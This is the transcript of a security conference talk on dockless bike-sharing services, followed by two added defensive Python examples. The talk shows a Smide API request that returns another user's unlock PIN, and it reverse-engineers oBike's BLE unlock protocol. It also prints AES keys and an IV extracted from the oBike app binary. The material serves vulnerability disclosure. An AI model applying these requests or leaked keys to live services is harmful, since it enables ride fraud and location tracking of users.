On the Security of Dockless Bike Sharing Services

Presentation held at the a41con.ch security conference

Published in: Technology

  1. 1. On the Security of Bike Sharing Services Antoine Neuenschwander AREA41 June 15th 2018
  2. 2. whoami Information Security Passionate Hobby Penetration Tester Beekeeper You can find me on Twitter: @ant0inet
  3. 3. Bike Sharing Services in Zurich Jul 2017 Oct 2016 Jan 2018 May 2018
  4. 4. Bike Sharing How To Install Mobile App Sign-up Buy credits Locate a bike on the map Start lease, ride & end lease Leave bike on the spot
  5. 5. Risks & Threats OPERATIONAL ISSUES – payment bypass – service availability – data protection BUSINESS IMPACT – financial loss – reputational damage SAFETY & LIABILITY – prevention of accidents
  6. 6. Smide BASED IN ZURICH backed by an insurance company HIGH-END E-BIKES CHF 6’500 unit price FLEET approx. 400 bikes (according to API) TRACKING integrated GPS and GSM modem FARE 0.25 CHF/min
  7. 7. Smide – Tracking smide GPS link GSM link REST
  8. 8. GET https://intern.smide.ch/api/v1/bikes HTTP/1.1 Accept: text/event-stream HTTP/1.1 200 OK Content-Type: text/event-stream; charset=UTF-8 { "type": "update", "data": { "id": "46", "name": "ZH253843", "batteryLevel": 76, "batteryRange": 40.0, "size": "20", "address": "Selnaustrasse 25, 8001 Zürich", "location": {"lat": 47.371944, "lng": 8.532015} } } ...
  9. 9. Smide – Theft Protection Theft mode is activated if the locked ST2 S is moved or pushed for an extended period of time. The motor is blocked and the position of the ST2 S is recorded periodically if a cell network connection exists.
  10. 10. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  11. 11. POST /api/v1/user/login HTTP/1.1 Content-Type: application/json { "email": "foo@example.com", "logintype": "password", "password": "correcthorsebatterystaple" } HTTP/1.1 200 OK Content-Type: application/json { "userId": "0123456789abcdef01234567", "token": <JWT-User1> }
  12. 12. <JWT-User1> = eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ1c2VycyIsI nVpZCI6IjAxMjM0NTY3ODlhYmNkZWYwMTIzNDU2NyIsInRpZCI6MTUwNDU 1OTkyMCwiZXhwIjoxNTA0NzMyNzIwfQ.F0GiaJaDxzaxa5GuoP-lvhI-r- XmTAkCdWpJuqA2GiUDKizbaIaN1xc-uZmdqBPucUMGzGJ- p7zZ5qx7_dpitQ { "alg": "HS512", "typ": "JWT" } { "iss": "users", "uid": "0123456789abcdef01234567", "tid": 1504559920, "exp": 1504732720 } 1741a2689683c736b16b91aea0ffa5be123eafe5e64c0902756a49baa0 361a25032a2cdb68868dd7173eb9999da813ee714306cc627ea7bcd9e6 ac7bfdda62
  13. 13. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  14. 14. POST /api/v1/booking HTTP/1.1 Authorization: Bearer <JWT USER-1> Content-Type: application/json {"bikeId": "133", "userId": "0123456789abcdef01234567"} HTTP/1.1 200 OK Content-Type: application/json { "bookingId": "12345", "active": true, "usage": false, "pin": "", "bike": { ... }, "startedAt": 1498257984 }
  15. 15. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  16. 16. PUT /api/v1/booking/12345/usage HTTP/1.1 Authorization: Bearer <JWT USER-1> Content-Type: application/json {"pin": 0, "usage": false} HTTP/1.1 200 OK Content-Type: application/json { "usage": false, "pin": "49637", }
  17. 17. PUT /api/v1/booking/12345/usage HTTP/1.1 Authorization: Bearer <JWT USER-2> Content-Type: application/json {"pin": 0, "usage": false} HTTP/1.1 200 OK Content-Type: application/json { "usage": false, "pin": "49637", }
  18. 18. Vuln Report 24.06.2017, 1:30 sent vuln report to info@smide.ch 24.06.2017, 14:19 got receipt from customer support 28.06.2017, 9:31 reply from product owner: – thanks for the report – vuln was fixed on 26.06. – 100 minutes offered
  19. 19. oBike HQ IN SINGAPORE deployed in 16 countries LOW-END BIKES single speed unit price estimation approx. USD 200 MAINTENANCE FREE solid rubber tires FARE 0.05 CHF/min
  20. 20. oBike – Tracking oBike GPS link BLE link REST
  21. 21. GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "iconUrl": null, "list": [{ "id": "041002258", "longitude": 8.535796, "latitude": 47.377381, "imei": "697432616C697A61", "countryId": 167, "helmet": 0 }, ... ] }, "success": true }
  22. 22. PUT /api/v1/bike/location HTTP/1.1 Host: mobile.o.bike Authorization: Bearer <AuthToken> { "latitude": 47.3728299, "longitude": 8.5306202, "bikeId": "041002997" } HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "message": " " }, "success": true } Location report success!
  23. 23. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070
  24. 24. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070
  25. 25. https://www.youtube.com/watch?v=Vl3Gl8w8n-Q
  26. 26. The AES encryption/decryption core allows the user to encrypt and decrypt data using the AES algorithm with 128-bit keys. The AES core also supports ECB, CBC, CFB, OFB, CTR, and CBC-MAC, as well as hardware support for CCM.
  27. 27. BLE Command Structure: preamble 67 74 | length 0D | cmd 86 | payload 59 AE B6 .. 39 31 | check FD. Direction: cmd 0x8X mobile → oBike, cmd 0x4X oBike → mobile. check = cmd ^ b[0] ^ b[1] ^ ... ^ b[N-1]
  28. 28. BLE Init. Request: preamble 67 74 | length 00 | cmd 86 | check 86. Response: preamble 67 74 | length 00 | cmd 46 | check 46.
  29. 29. BLE Store Coordinates. Request: preamble 67 74 | length 13 | cmd 81 | payload 30 38 2e 35 33 30 38 34 32 32 (08.5308422) 34 37 2e 33 37 32 37 36 30 (47.372760) | check b7
  30. 30. BLE Receive Challenge 67 74 preamble 13 length 41 cmd 00 11 51 00 constant (unknown) response check 28aa unknown 06 ef 5f 34 32 bit challenge 01 00 unknown
  31. 31. BLE Send Response. Request: preamble 67 74 | length 18 | cmd 82 | key idx 8b | user id 00 00 01 23 45 67 00 | timestamp (little endian) 2a 72 9d 59 | AES CBC-MAC (truncated to 96 bits, why?) 2f 42 d3 b4 3b 1b 9d 51 e7 67 13 e3 | check 77
  32. 32. 67 74 preamble 18 length 46 cmd response check 8b 00 00 01 23 45 67 00 user id 59 9d 72 2a timestamp (big endian) 44 31 39 33 36 42 33 31 37 bike id (D1936B317) 2a 72 9d 59 timestamp (little endian) trx 00 30 38 2e .. 32 08.5308422 34 37 2e .. 30 47.372760 87 76 f3 7a 8c be 90 f8 4b a4 fa 00 2e ae e3 dc AES CBC-MAC (128 bits) key idx 91
  33. 33. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070 Texas Instruments CC2541 Debug Pads
  34. 34. https://www.pentestpartners.com/security-blog/dumping-cc2540-firmware-an-iot-how-to/
  35. 35. http://web.archive.org/web/20180102175104/http://www.comp.nus.edu.sg/~hugh/CS3235/CS3235-SemI-2017-18-FinalProjects.pdf
  36. 36. OBIKE MOBILE APP BACKEND challenge response acknowledgement unlock bike start billing BLE HTTP
  37. 37. HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "code": 400, "error": "The bike needs to be repaired, please try another one for your safety." }, "success": false }
  38. 38. GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "code": 500, "error": "Server is busy,please try later" }, "errorCode": 400, "success": false }
  39. 39. POST /api/v1/bike/list HTTP/1.1 Host: mobile.o.bike { "value": "1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0 e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637 279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b 62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5 cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b b34a3626e843922c7c2b222e6f32daf69f130e9350" }
  40. 40. $ hexdump -C lib/x86/libobike.so ... 00001c90 65 fc 5b 5d c3 41 45 53 2f 43 42 43 2f 50 4b 43 |e.[].AES/CBC/PKC| 00001ca0 53 35 50 61 64 64 69 6e 67 00 6f 42 41 64 64 4d |S5Padding.oBAddM| 00001cb0 59 46 55 7a 4c 65 64 00 31 32 33 34 35 36 37 38 |YFUzLed.12345678| 00001cc0 39 30 31 32 33 34 35 36 00 6f 42 61 64 64 58 34 |90123456.oBaddX4| 00001cd0 62 75 68 42 4d 47 00 41 45 53 00 53 48 41 31 00 |buhBMG.AES.SHA1.| ...
  41. 41. REST Encryption AES-128 CBC plaintext SHA1 "oBaddX4buhBMG" "&" MAC plaintext MAC"&" ciphertext "oBAddMYFUzLed" app version no. "1234567890123456"
  42. 42. POST /api/v1/bike/list HTTP/1.1 Host: mobile.o.bike { "value": "1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0 e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637 279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b 62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5 cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b b34a3626e843922c7c2b222e6f32daf69f130e9350" } { "countryCode": 41, "latitude": "47.37326917039802", "longitude": "8.531275056302547", "deviceId": "0123456789abc-0123456789abcdef01", "dateTime": "1508318416019" } &21b7eaf2631f62fca73faf4c63fd75b1302aed4f
  43. 43. Conclusions ◎ Think about what could go wrong which risks are you willing to accept? ◎ Perform security audits get rid of the low hanging fruits ◎ Flaws will be found, keys will be leaked... make the devices fixable
  44. 44. Thanks! Any questions? 195.176.3.20 http://github.com/antoinet/obike @ant0inet @BrokenOBikes
  45. 45. GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "iconUrl": null, "list": [{ "id": "041002258", "longitude": 8.535796, "latitude": 47.377381, "imei": "697432616C697A61", "countryId": 167, "helmet": 0 }, ... ] }, "success": true } International Mobile Equipment Identity?
  46. 46. 726934686572616C ri4heral 69376F6E53696D39 i7onSim9 726934686572616C ri4heral 6F6E384C30503166 on8L0P1f 7469376F6E53696D ti7onSim 30503166756E6374 0P1funct 30503166756E6374 0P1funct 7432616C697A6174 t2alizat 6E53696D39706C65 nSim9ple 69376F6E53696D39 i7onSim9 616C48496E697477 alHInitw 756E637469376F6E uncti7on 3166756e63746937 1functi7 4C30503166756E63 L0P1func 756E637469376F6E uncti7on 686572616C48496E heralHIn 3166756E63746937 1functi7 4550657269346865 EPeri4he 7432616C697A6174 t2alizat 3166756E63746937 1functi7 697432616C697A61 it2aliza 6C697A6174346F6E lizat4on 6C48496E6974776F lHInitwo 616C48496E697477 alHInitw 4C30503166756E63 L0P1func 39706C65424C4550 9pleBLEP 66756E637469376F functi7o 686572616C48496E heralHIn 6934686572616C48 i4heralH 616C697A6174346F alizat4o 6E384C3050316675 n8L0P1fu 4550657269346865 EPeri4he 376F6E53696D3970 7onSim9p 32616C697A617434 2alizat4 616C48496E697477 alHInitw 696D39706C65424C im9pleBL 6572693468657261 eri4hera 4C30503166756E63 L0P1func 39706C65424C4550 9pleBLEP 6174346F6E384C30 at4on8L0 ... InitalizatonLPfunctionSimpleBLEPeriheralHInitwo ...
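
Slides 16 and 17 show the same PUT /api/v1/booking/12345/usage request answered with the same PIN for two different users' tokens. The following added example (not Smide's code and not from the talk) puts that authentication-only behaviour beside an ownership check. The secret, the in-memory booking store and every function name are assumptions, and the tokens are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-demo-key"  # assumption: server-side HS512 secret
# Constructed booking store; field names follow the slide-14 response.
BOOKINGS = {"12345": {"userId": "0123456789abcdef01234567", "pin": "49637"}}

def _enc(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _sign(msg: str) -> bytes:
    return hmac.new(SECRET, msg.encode(), hashlib.sha512).digest()

def issue_token(uid: str, ttl: int = 3600) -> str:
    """Mint an HS512 JWT with the claim names from slide 12 (demo helper)."""
    claims = {"iss": "users", "uid": uid, "exp": int(time.time()) + ttl}
    msg = _enc(b'{"alg":"HS512","typ":"JWT"}') + "." + _enc(json.dumps(claims).encode())
    return msg + "." + _enc(_sign(msg))

def verify_token(token: str) -> dict:
    """Return the claims if signature and expiry are valid, else raise."""
    try:
        header, body, sig = token.split(".")
        valid = hmac.compare_digest(_sign(header + "." + body), _dec(sig))
        claims = json.loads(_dec(body)) if valid else {}
    except ValueError as exc:
        raise PermissionError("malformed token") from exc
    if not valid or claims.get("exp", 0) < time.time():
        raise PermissionError("invalid or expired token")
    return claims

def usage_pin_authn_only(token: str, booking_id: str) -> str:
    """Behaviour on slides 16-17: any valid token is handed the PIN."""
    verify_token(token)
    return BOOKINGS[booking_id]["pin"]

def usage_pin_owner_only(token: str, booking_id: str) -> str:
    """Hardened: the booking must belong to the uid inside the token."""
    uid = str(verify_token(token).get("uid"))
    booking = BOOKINGS.get(booking_id)
    if booking is None or not hmac.compare_digest(booking["userId"], uid):
        raise PermissionError("booking not found")  # same reply either way
    return booking["pin"]
```

Returning the same error for a missing booking and for someone else's booking keeps the endpoint from confirming which booking ids exist.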

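The frame layout from slide 27, as an added Python example that is not part of the talk or the author's repository: a parser that validates the preamble, the length byte and the XOR check byte. Function and class names are hypothetical; the two sample frames are the ones shown on slides 28 and 29.

```python
PREAMBLE = bytes.fromhex("6774")
DIRECTION = {0x80: "mobile -> oBike", 0x40: "oBike -> mobile"}  # slide 27

# Frames copied from slides 28 (init request) and 29 (store coordinates).
INIT_REQUEST = bytes.fromhex("6774008686")
STORE_COORDS = bytes.fromhex("67741381") + b"08.5308422" + b"47.372760" + b"\xb7"


class FrameError(ValueError):
    """Buffer does not match the slide-27 layout."""


def xor_check(cmd: int, payload: bytes) -> int:
    """check = cmd ^ b[0] ^ ... ^ b[N-1]; unkeyed, so it only catches corruption."""
    check = cmd
    for byte in payload:
        check ^= byte
    return check


def parse_frame(raw: bytes) -> dict:
    """Split preamble | length | cmd | payload | check, validating each field."""
    if len(raw) < 5:
        raise FrameError("shorter than the 5-byte empty frame")
    if raw[:2] != PREAMBLE:
        raise FrameError("bad preamble")
    length, cmd = raw[2], raw[3]
    if len(raw) != 5 + length:
        raise FrameError(f"length byte {length} != payload bytes {len(raw) - 5}")
    payload, check = raw[4:4 + length], raw[-1]
    if check != xor_check(cmd, payload):
        raise FrameError("check byte mismatch")
    direction = DIRECTION.get(cmd & 0xF0)
    if direction is None:
        raise FrameError(f"unknown direction nibble in cmd 0x{cmd:02x}")
    return {"cmd": cmd, "direction": direction, "payload": payload}


if __name__ == "__main__":
    for frame in (INIT_REQUEST, STORE_COORDS):
        print(parse_frame(frame))
```

The check byte carries no secret, so it says nothing about who produced a frame; in this protocol only the AES CBC-MAC fields on slides 31 and 32 are keyed.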